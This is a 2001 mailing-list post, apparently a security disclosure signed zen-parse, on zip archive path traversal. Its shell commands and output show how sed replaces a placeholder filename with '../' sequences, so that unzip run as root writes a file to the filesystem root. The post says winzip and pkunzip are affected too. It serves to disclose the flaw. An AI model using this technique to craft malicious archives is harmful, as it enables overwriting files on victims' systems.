>it was possible to create a zip archive with some files in, hex edit the
>archive and change the locations of some of these files, thus making it
>extremely easy to transparently replace files on a system that the archive
>is extracted on. This used to be a particularly nasty trick on amiga bbs's
its still possible.
tested with unzip (under rh 7.0)
this also apprently works with winzip and pkunzip
$ echo "@echo haxed" >ddsddsddsddsddsddsautoexec.bta
$ zip file ddsddsddsddsddsddsautoexec.bta
$ unzip -t file.zip
Archive: file.zip
testing: ddsddsddsddsddsddsautoexec.bta OK
No errors detected in compressed data of file.zip.
$ sed 's,dds,../,g' <file.zip newfile.zip
$ unzip -t newfile.zip
Archive: newfile.zip
testing: ../../../../../../autoexec.bta OK
No errors detected in compressed data of newfile.zip.
$ unzip newfile.zip
Archive: newfile.zip
error: cannot create ../../../../../../autoexec.bta
$ su
Password:
# unzip newfile.zip
Archive: newfile.zip
extracting: ../../../../../../autoexec.bta
# ls -al /autoexec.bta
-rw-r--r-- 1 root root 12 Jun 26 06:00 /autoexec.bta
-- zen-parse
application
This archive was generated by hypermail 2b30 : Tue Jun 26 2001 - 08:45:04 PDT